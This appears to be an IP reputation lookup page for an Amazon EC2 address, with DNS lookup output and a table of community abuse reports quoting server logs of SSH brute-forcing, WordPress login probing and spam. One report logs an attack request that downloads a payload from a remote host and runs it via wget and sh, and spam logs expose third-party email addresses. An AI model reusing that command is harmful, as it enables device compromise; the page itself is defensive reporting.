52.42.65.90 - IPInfo

Basic Info

City: Boardman

Region: Oregon

Country: United States

Internet Service Provider: Amazon Technologies Inc.

Hostname: unknown

Organization: Amazon.com, Inc.

Usage Type: Data Center/Web Hosting/Transit

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbots	tcp 2004	2019-09-05 02:00:41

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 52.42.65.90
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14841
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;52.42.65.90.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019090401 1800 900 604800 86400

;; Query time: 3 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Thu Sep 05 02:00:36 CST 2019
;; MSG SIZE  rcvd: 115

Host info

90.65.42.52.in-addr.arpa domain name pointer ec2-52-42-65-90.us-west-2.compute.amazonaws.com.

Nslookup info:

Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
90.65.42.52.in-addr.arpa	name = ec2-52-42-65-90.us-west-2.compute.amazonaws.com.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
62.234.146.92	attackspam	Mar 13 03:44:51 gw1 sshd[28993]: Failed password for root from 62.234.146.92 port 44890 ssh2 ...	2020-03-13 08:58:41
14.21.42.158	attackspambots	IP blocked	2020-03-13 08:49:12
92.101.232.242	attack	2020-03-1222:04:171jCV05-0005Bx-3f\<=info@whatsup2013.chH=\(localhost\)[183.89.238.6]:57159P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2303id=D2D7613239EDC370ACA9E058ACB030AC@whatsup2013.chT="fromDarya"fornikhidoppalapudi9010@gmail.comuniquenick0.0@gmail.com2020-03-1222:04:471jCV0Z-0005GT-II\<=info@whatsup2013.chH=ip92-101-232-242.onego.ru\(localhost\)[92.101.232.242]:41255P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2371id=F5F046151ECAE4578B8EC77F8B44F4C0@whatsup2013.chT="fromDarya"forbadass4x4_530@yahoo.comrich.tomes@hotmail.com2020-03-1222:05:051jCV0o-0005H1-Ar\<=info@whatsup2013.chH=\(localhost\)[183.89.215.23]:53033P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2320id=A6A315464D99B704D8DD942CD8FAB76E@whatsup2013.chT="fromDarya"forjs4111628@gmail.comcraigbarry452@gmail.com2020-03-1222:06:351jCV2I-0005Oh-9N\<=info@whatsup2013.chH=\(localhost\)[14.168.231.211]:52031P	2020-03-13 09:19:18
49.233.134.31	attackbots	Mar 12 22:02:10 mail sshd\[30520\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.233.134.31 user=root Mar 12 22:02:12 mail sshd\[30520\]: Failed password for root from 49.233.134.31 port 37590 ssh2 Mar 12 22:06:35 mail sshd\[30566\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.233.134.31 user=root ...	2020-03-13 09:20:08
183.89.215.23	attack	2020-03-1222:04:171jCV05-0005Bx-3f\<=info@whatsup2013.chH=\(localhost\)[183.89.238.6]:57159P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2303id=D2D7613239EDC370ACA9E058ACB030AC@whatsup2013.chT="fromDarya"fornikhidoppalapudi9010@gmail.comuniquenick0.0@gmail.com2020-03-1222:04:471jCV0Z-0005GT-II\<=info@whatsup2013.chH=ip92-101-232-242.onego.ru\(localhost\)[92.101.232.242]:41255P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2371id=F5F046151ECAE4578B8EC77F8B44F4C0@whatsup2013.chT="fromDarya"forbadass4x4_530@yahoo.comrich.tomes@hotmail.com2020-03-1222:05:051jCV0o-0005H1-Ar\<=info@whatsup2013.chH=\(localhost\)[183.89.215.23]:53033P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2320id=A6A315464D99B704D8DD942CD8FAB76E@whatsup2013.chT="fromDarya"forjs4111628@gmail.comcraigbarry452@gmail.com2020-03-1222:06:351jCV2I-0005Oh-9N\<=info@whatsup2013.chH=\(localhost\)[14.168.231.211]:52031P	2020-03-13 09:16:54
104.167.106.40	attackspambots	port	2020-03-13 08:44:12
190.146.184.215	attackbots	2020-03-12T22:58:45.833889randservbullet-proofcloud-66.localdomain sshd[15624]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.146.184.215 user=root 2020-03-12T22:58:47.792545randservbullet-proofcloud-66.localdomain sshd[15624]: Failed password for root from 190.146.184.215 port 42214 ssh2 2020-03-12T23:10:30.622687randservbullet-proofcloud-66.localdomain sshd[15688]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.146.184.215 user=root 2020-03-12T23:10:32.696957randservbullet-proofcloud-66.localdomain sshd[15688]: Failed password for root from 190.146.184.215 port 49430 ssh2 ...	2020-03-13 08:54:16
122.51.98.140	attackbotsspam	Mar 11 09:30:40 mailrelay sshd[2332]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.51.98.140 user=r.r Mar 11 09:30:42 mailrelay sshd[2332]: Failed password for r.r from 122.51.98.140 port 32976 ssh2 Mar 11 09:30:43 mailrelay sshd[2332]: Received disconnect from 122.51.98.140 port 32976:11: Bye Bye [preauth] Mar 11 09:30:43 mailrelay sshd[2332]: Disconnected from 122.51.98.140 port 32976 [preauth] Mar 11 09:36:45 mailrelay sshd[2456]: Invalid user em3-user from 122.51.98.140 port 41144 Mar 11 09:36:45 mailrelay sshd[2456]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.51.98.140 Mar 11 09:36:48 mailrelay sshd[2456]: Failed password for invalid user em3-user from 122.51.98.140 port 41144 ssh2 Mar 11 09:36:48 mailrelay sshd[2456]: Received disconnect from 122.51.98.140 port 41144:11: Bye Bye [preauth] Mar 11 09:36:48 mailrelay sshd[2456]: Disconnected from 122.51.98.140 port 41144 ........ -------------------------------	2020-03-13 08:55:53
142.93.239.190	attackspambots	SSH brute force	2020-03-13 08:58:57
167.172.49.241	attackspam	Mar 11 16:24:43 scivo sshd[28400]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.49.241 user=r.r Mar 11 16:24:45 scivo sshd[28400]: Failed password for r.r from 167.172.49.241 port 37682 ssh2 Mar 11 16:24:45 scivo sshd[28400]: Received disconnect from 167.172.49.241: 11: Bye Bye [preauth] Mar 11 16:39:37 scivo sshd[29266]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.49.241 user=r.r Mar 11 16:39:39 scivo sshd[29266]: Failed password for r.r from 167.172.49.241 port 36484 ssh2 Mar 11 16:39:39 scivo sshd[29266]: Received disconnect from 167.172.49.241: 11: Bye Bye [preauth] Mar 11 16:45:15 scivo sshd[29585]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.49.241 user=r.r Mar 11 16:45:17 scivo sshd[29585]: Failed password for r.r from 167.172.49.241 port 57180 ssh2 Mar 11 16:45:17 scivo sshd[29585]: Received disconnect from........ -------------------------------	2020-03-13 08:46:37
88.247.35.60	attackbots	firewall-block, port(s): 23/tcp	2020-03-13 09:00:13
91.121.175.61	attackspam	Mar 13 00:02:28 jane sshd[4131]: Failed password for root from 91.121.175.61 port 58238 ssh2 ...	2020-03-13 09:15:07
94.8.99.234	attackbotsspam	ENG,DEF GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE	2020-03-13 09:11:46
180.250.115.93	attackspambots	Mar 13 01:25:20 srv206 sshd[672]: Invalid user git from 180.250.115.93 Mar 13 01:25:20 srv206 sshd[672]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=180.250.115.93 Mar 13 01:25:20 srv206 sshd[672]: Invalid user git from 180.250.115.93 Mar 13 01:25:22 srv206 sshd[672]: Failed password for invalid user git from 180.250.115.93 port 47299 ssh2 ...	2020-03-13 09:06:28
202.44.54.48	attack	202.44.54.48 - - \[12/Mar/2020:22:06:39 +0100\] "POST /wp-login.php HTTP/1.0" 200 6517 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" 202.44.54.48 - - \[12/Mar/2020:22:06:41 +0100\] "POST /wp-login.php HTTP/1.0" 200 6495 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0" 202.44.54.48 - - \[12/Mar/2020:22:06:42 +0100\] "POST /xmlrpc.php HTTP/1.0" 200 736 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0"	2020-03-13 09:12:06

Recently Reported IPs

196.85.149.13	119.213.160.188	72.87.60.68	123.216.101.240
86.61.141.170	219.143.15.190	191.217.175.42	168.174.72.188
113.29.6.67	107.102.56.181	53.233.216.217	119.76.97.139
106.52.93.188	103.41.40.240	42.88.140.121	208.6.215.116
80.151.219.189	167.200.82.116	202.235.172.158	88.165.243.101